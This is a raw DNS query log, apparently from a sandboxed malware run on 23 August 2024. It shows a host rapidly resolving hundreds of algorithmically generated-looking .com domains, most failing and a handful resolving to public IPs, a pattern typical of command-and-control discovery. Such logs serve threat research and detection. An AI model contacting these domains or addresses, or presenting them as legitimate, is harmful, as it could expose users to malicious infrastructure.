Aug 23, 2024 18:47:50.162347078 CEST	1.1.1.1	192.168.2.4	0xf5b8	Name error (3)	qebykoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.163533926 CEST	1.1.1.1	192.168.2.4	0x4fc2	Name error (3)	pupypil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.163549900 CEST	1.1.1.1	192.168.2.4	0x1152	Name error (3)	vonykam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.163559914 CEST	1.1.1.1	192.168.2.4	0x2085	Name error (3)	lyvyjoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.164674044 CEST	1.1.1.1	192.168.2.4	0xd2db	Name error (3)	vojybef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.164684057 CEST	1.1.1.1	192.168.2.4	0x437d	Name error (3)	vopyput.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.165716887 CEST	1.1.1.1	192.168.2.4	0x5997	Name error (3)	gatypuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.166651011 CEST	1.1.1.1	192.168.2.4	0x4636	Name error (3)	purytyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.166661978 CEST	1.1.1.1	192.168.2.4	0x8980	Name error (3)	qegyvag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.167840958 CEST	1.1.1.1	192.168.2.4	0x18e5	Name error (3)	lyrytyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.167850971 CEST	1.1.1.1	192.168.2.4	0x1f39	Name error (3)	vocyjik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.167860031 CEST	1.1.1.1	192.168.2.4	0x6f2c	Name error (3)	gacyhuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.168001890 CEST	1.1.1.1	192.168.2.4	0x698	Name error (3)	pufycog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.169028044 CEST	1.1.1.1	192.168.2.4	0x69af	Name error (3)	lyxygur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.169039011 CEST	1.1.1.1	192.168.2.4	0x6fc1	Name error (3)	gahyvab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.169048071 CEST	1.1.1.1	192.168.2.4	0xd4f4	Name error (3)	gaqyres.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.169059038 CEST	1.1.1.1	192.168.2.4	0xca7b	Name error (3)	pumywov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.169661999 CEST	1.1.1.1	192.168.2.4	0x5b45	Name error (3)	vofycim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.169671059 CEST	1.1.1.1	192.168.2.4	0x24c2	Name error (3)	puzygyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.169687986 CEST	1.1.1.1	192.168.2.4	0x3f03	Name error (3)	qeqyrav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.169698954 CEST	1.1.1.1	192.168.2.4	0x51d6	Name error (3)	galyfez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.169879913 CEST	1.1.1.1	192.168.2.4	0xb641	Name error (3)	lysyxuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.170994043 CEST	1.1.1.1	192.168.2.4	0xe8b1	Name error (3)	qedyxuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.171005011 CEST	1.1.1.1	192.168.2.4	0x74fb	Name error (3)	qebyqig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.171015024 CEST	1.1.1.1	192.168.2.4	0xa76	Name error (3)	vonyqof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.171025991 CEST	1.1.1.1	192.168.2.4	0xf2af	Name error (3)	lymywad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.171946049 CEST	1.1.1.1	192.168.2.4	0xe136	Name error (3)	vopyzyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.172138929 CEST	1.1.1.1	192.168.2.4	0xe937	Name error (3)	pupyxuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.172149897 CEST	1.1.1.1	192.168.2.4	0xd4ac	Name error (3)	lykyfax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.173026085 CEST	1.1.1.1	192.168.2.4	0x1c3d	Name error (3)	qekyfep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.173037052 CEST	1.1.1.1	192.168.2.4	0xdf7a	Name error (3)	pujydap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.173047066 CEST	1.1.1.1	192.168.2.4	0x6dc0	Name error (3)	vojydoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.173486948 CEST	1.1.1.1	192.168.2.4	0x1260	Name error (3)	lyvymun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.173497915 CEST	1.1.1.1	192.168.2.4	0xab6d	Name error (3)	qetylel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.173506021 CEST	1.1.1.1	192.168.2.4	0xdb57	Name error (3)	gahydos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.173985004 CEST	1.1.1.1	192.168.2.4	0xa58c	Name error (3)	gacynyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.174370050 CEST	1.1.1.1	192.168.2.4	0xe270	Name error (3)	vocymum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.174381971 CEST	1.1.1.1	192.168.2.4	0xa0d6	Name error (3)	qegysiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.174695015 CEST	1.1.1.1	192.168.2.4	0x652f	Name error (3)	qexynyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.175193071 CEST	1.1.1.1	192.168.2.4	0xa584	Name error (3)	lygysid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.175628901 CEST	1.1.1.1	192.168.2.4	0xa7a6	Name error (3)	puvymug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.182976961 CEST	1.1.1.1	192.168.2.4	0x2ca8	Name error (3)	qekynyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.183850050 CEST	1.1.1.1	192.168.2.4	0x5c5a	Name error (3)	galynus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.184283018 CEST	1.1.1.1	192.168.2.4	0xb660	Name error (3)	pujybev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.185045004 CEST	1.1.1.1	192.168.2.4	0x9877	Name error (3)	qetytup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.188090086 CEST	1.1.1.1	192.168.2.4	0x23ba	Name error (3)	puvyjiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.188261032 CEST	1.1.1.1	192.168.2.4	0xf76c	Name error (3)	qedysol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.190515995 CEST	1.1.1.1	192.168.2.4	0x6ab1	Name error (3)	gadycih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.190526009 CEST	1.1.1.1	192.168.2.4	0xfc27	Name error (3)	vowyrec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.190536022 CEST	1.1.1.1	192.168.2.4	0x8b31	Name error (3)	volygyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.192748070 CEST	1.1.1.1	192.168.2.4	0x92a6	Name error (3)	ganyqib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.194565058 CEST	1.1.1.1	192.168.2.4	0x6aa8	Name error (3)	gatyzyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.195137024 CEST	1.1.1.1	192.168.2.4	0x375b	Name error (3)	purylal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.195296049 CEST	1.1.1.1	192.168.2.4	0x3b51	Name error (3)	lygyvon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.195353985 CEST	1.1.1.1	192.168.2.4	0x3b5e	Name error (3)	vowykat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.195364952 CEST	1.1.1.1	192.168.2.4	0x19f4	Name error (3)	pufypuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.315224886 CEST	1.1.1.1	192.168.2.4	0xb469	Name error (3)	ganykah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.321523905 CEST	1.1.1.1	192.168.2.4	0x203b	Name error (3)	lysysir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.323723078 CEST	1.1.1.1	192.168.2.4	0x7f12	Name error (3)	qexyhul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.047638893 CEST	1.1.1.1	192.168.2.4	0xf5a4	Name error (3)	gaqykoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.052761078 CEST	1.1.1.1	192.168.2.4	0x2d96	Name error (3)	lyxynej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.053709984 CEST	1.1.1.1	192.168.2.4	0x9d99	Name error (3)	vofypuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.064255953 CEST	1.1.1.1	192.168.2.4	0xe609	Name error (3)	puzybeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.064960957 CEST	1.1.1.1	192.168.2.4	0x45ca	Name error (3)	qeqykop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.076281071 CEST	1.1.1.1	192.168.2.4	0x8f1e	Name error (3)	gadypub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.107697964 CEST	1.1.1.1	192.168.2.4	0x7327	Name error (3)	lymyjix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.108751059 CEST	1.1.1.1	192.168.2.4	0xa304	Name error (3)	pupyteg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.108939886 CEST	1.1.1.1	192.168.2.4	0x96e8	Name error (3)	vopyrem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.108951092 CEST	1.1.1.1	192.168.2.4	0xcf98	Name error (3)	galyvaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.109416008 CEST	1.1.1.1	192.168.2.4	0xc42c	Name error (3)	ganyhus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.110503912 CEST	1.1.1.1	192.168.2.4	0xc29a	Name error (3)	pumyjip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.110515118 CEST	1.1.1.1	192.168.2.4	0x98ba	Name error (3)	volybak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.113890886 CEST	1.1.1.1	192.168.2.4	0x6040	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.113890886 CEST	1.1.1.1	192.168.2.4	0x6040	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.113955975 CEST	1.1.1.1	192.168.2.4	0x5180	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.115859032 CEST	1.1.1.1	192.168.2.4	0x1d72	Name error (3)	vocygef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.115869999 CEST	1.1.1.1	192.168.2.4	0x33f8	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.115879059 CEST	1.1.1.1	192.168.2.4	0x3e6f	Name error (3)	qebyhuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.115889072 CEST	1.1.1.1	192.168.2.4	0xee5b	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.115899086 CEST	1.1.1.1	192.168.2.4	0x20c9	Name error (3)	lygyxux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.115910053 CEST	1.1.1.1	192.168.2.4	0xf41e	Name error (3)	vowyqik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.115921021 CEST	1.1.1.1	192.168.2.4	0xe735	Name error (3)	qeqyqul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.116048098 CEST	1.1.1.1	192.168.2.4	0x62c2	Name error (3)	qegyxup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.116058111 CEST	1.1.1.1	192.168.2.4	0x4a2f	Name error (3)	pujycil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.117758989 CEST	1.1.1.1	192.168.2.4	0x8b94	Name error (3)	puvygyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.117786884 CEST	1.1.1.1	192.168.2.4	0xd0e5	Name error (3)	vojycit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.117796898 CEST	1.1.1.1	192.168.2.4	0x6229	Name error (3)	lyvygyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.117806911 CEST	1.1.1.1	192.168.2.4	0x3228	Name error (3)	vofyzyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.117815971 CEST	1.1.1.1	192.168.2.4	0xf36e	Name error (3)	gahycuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.117825985 CEST	1.1.1.1	192.168.2.4	0x11ee	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.117835045 CEST	1.1.1.1	192.168.2.4	0x4658	Name error (3)	gaqyqiw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.117844105 CEST	1.1.1.1	192.168.2.4	0x7446	Name error (3)	qexyfag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.117852926 CEST	1.1.1.1	192.168.2.4	0x4a91	Name error (3)	gatyrah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.120379925 CEST	1.1.1.1	192.168.2.4	0xe1f5	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.120390892 CEST	1.1.1.1	192.168.2.4	0x4860	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.120404005 CEST	1.1.1.1	192.168.2.4	0x3584	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.122267008 CEST	1.1.1.1	192.168.2.4	0x9eb	Name error (3)	puzydog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.124087095 CEST	1.1.1.1	192.168.2.4	0x495a	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.125272036 CEST	1.1.1.1	192.168.2.4	0xa3d3	Name error (3)	qedytyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.125730038 CEST	1.1.1.1	192.168.2.4	0xb1	Name error (3)	qekyvol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.128767967 CEST	1.1.1.1	192.168.2.4	0xace7	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.129673958 CEST	1.1.1.1	192.168.2.4	0x678a	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.137514114 CEST	1.1.1.1	192.168.2.4	0x5b2f	Name error (3)	purywoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.137759924 CEST	1.1.1.1	192.168.2.4	0x1c34	Name error (3)	lyrywoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.137770891 CEST	1.1.1.1	192.168.2.4	0xc66d	Name error (3)	lysytyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.137856007 CEST	1.1.1.1	192.168.2.4	0x5974	Name error (3)	gacyfeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.137866974 CEST	1.1.1.1	192.168.2.4	0x76d8	Name error (3)	qetyraq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.137893915 CEST	1.1.1.1	192.168.2.4	0xba02	Name error (3)	lykyvor.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.138226032 CEST	1.1.1.1	192.168.2.4	0xa0c9	Name error (3)	lyxyfan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.153215885 CEST	1.1.1.1	192.168.2.4	0xff37	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.264358044 CEST	1.1.1.1	192.168.2.4	0x365d	Name error (3)	vonyjuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.264813900 CEST	1.1.1.1	192.168.2.4	0xde1	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.266904116 CEST	1.1.1.1	192.168.2.4	0xf9c0	Name error (3)	pufyxyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.282501936 CEST	1.1.1.1	192.168.2.4	0x3f5e	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.282501936 CEST	1.1.1.1	192.168.2.4	0x3f5e	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.293555975 CEST	1.1.1.1	192.168.2.4	0x1b1f	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.299936056 CEST	1.1.1.1	192.168.2.4	0x7a21	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.321419954 CEST	1.1.1.1	192.168.2.4	0xa8d8	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.329874992 CEST	1.1.1.1	192.168.2.4	0x7ee0	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.348587990 CEST	1.1.1.1	192.168.2.4	0x71ae	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.380711079 CEST	1.1.1.1	192.168.2.4	0x338	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.382843971 CEST	1.1.1.1	192.168.2.4	0xc2ff	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.402334929 CEST	1.1.1.1	192.168.2.4	0xe97f	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.403281927 CEST	1.1.1.1	192.168.2.4	0x9835	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.407036066 CEST	1.1.1.1	192.168.2.4	0xb584	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.407391071 CEST	1.1.1.1	192.168.2.4	0x5e0b	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.408288002 CEST	1.1.1.1	192.168.2.4	0x7a60	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.408432961 CEST	1.1.1.1	192.168.2.4	0xdbb6	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.408693075 CEST	1.1.1.1	192.168.2.4	0x4555	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.410000086 CEST	1.1.1.1	192.168.2.4	0xe86c	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.414474964 CEST	1.1.1.1	192.168.2.4	0x3d27	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.414485931 CEST	1.1.1.1	192.168.2.4	0x786d	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.416266918 CEST	1.1.1.1	192.168.2.4	0xb504	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.419214010 CEST	1.1.1.1	192.168.2.4	0xab9	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.427866936 CEST	1.1.1.1	192.168.2.4	0x5c7c	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.429327011 CEST	1.1.1.1	192.168.2.4	0x190a	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.430444956 CEST	1.1.1.1	192.168.2.4	0x521a	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.430454969 CEST	1.1.1.1	192.168.2.4	0x3e7d	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.430464029 CEST	1.1.1.1	192.168.2.4	0xabe6	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.430537939 CEST	1.1.1.1	192.168.2.4	0x136a	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.430548906 CEST	1.1.1.1	192.168.2.4	0x4527	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.430557966 CEST	1.1.1.1	192.168.2.4	0xe3e3	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.431432962 CEST	1.1.1.1	192.168.2.4	0xd703	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.431546926 CEST	1.1.1.1	192.168.2.4	0x50f8	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.431564093 CEST	1.1.1.1	192.168.2.4	0xa09b	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.433495998 CEST	1.1.1.1	192.168.2.4	0xe24f	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.433680058 CEST	1.1.1.1	192.168.2.4	0xb93d	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.436259031 CEST	1.1.1.1	192.168.2.4	0xe6e9	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.441755056 CEST	1.1.1.1	192.168.2.4	0x5fe2	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.443815947 CEST	1.1.1.1	192.168.2.4	0xd57f	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.445029020 CEST	1.1.1.1	192.168.2.4	0xf1d1	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.453041077 CEST	1.1.1.1	192.168.2.4	0xa33a	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.453041077 CEST	1.1.1.1	192.168.2.4	0xa33a	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.454531908 CEST	1.1.1.1	192.168.2.4	0xb9fa	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.454894066 CEST	1.1.1.1	192.168.2.4	0x456	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.457484961 CEST	1.1.1.1	192.168.2.4	0xefef	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.458055019 CEST	1.1.1.1	192.168.2.4	0x77cb	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.545270920 CEST	1.1.1.1	192.168.2.4	0x97c0	No error (0)	lysyfyj.com		69.162.80.59	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.551512957 CEST	1.1.1.1	192.168.2.4	0xf8ba	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.567964077 CEST	1.1.1.1	192.168.2.4	0x1cb7	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.570564032 CEST	1.1.1.1	192.168.2.4	0x1b64	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.594535112 CEST	1.1.1.1	192.168.2.4	0x4c40	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.594923019 CEST	1.1.1.1	192.168.2.4	0xd0c7	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.616799116 CEST	1.1.1.1	192.168.2.4	0x8bfa	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:52.012447119 CEST	1.1.1.1	192.168.2.4	0x4769	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:52.012447119 CEST	1.1.1.1	192.168.2.4	0x4769	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:52.012447119 CEST	1.1.1.1	192.168.2.4	0x4769	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:52.012447119 CEST	1.1.1.1	192.168.2.4	0x4769	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:52.012447119 CEST	1.1.1.1	192.168.2.4	0x4769	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:52.012447119 CEST	1.1.1.1	192.168.2.4	0x4769	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:52.012447119 CEST	1.1.1.1	192.168.2.4	0x4769	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:52.012447119 CEST	1.1.1.1	192.168.2.4	0x4769	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:53.336301088 CEST	1.1.1.1	192.168.2.4	0x5239	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:53.338781118 CEST	1.1.1.1	192.168.2.4	0x5239	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.566001892 CEST	1.1.1.1	192.168.2.4	0x241b	Name error (3)	lykymox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.566499949 CEST	1.1.1.1	192.168.2.4	0x5717	Name error (3)	ganyzub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.566510916 CEST	1.1.1.1	192.168.2.4	0x7dca	Name error (3)	pujymip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.567435980 CEST	1.1.1.1	192.168.2.4	0x37ac	Name error (3)	lyvylyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.567449093 CEST	1.1.1.1	192.168.2.4	0x59ce	Name error (3)	vopydek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.567459106 CEST	1.1.1.1	192.168.2.4	0x839	Name error (3)	qebylug.com	none	none	A (IP address)	IN (0x0001)	false
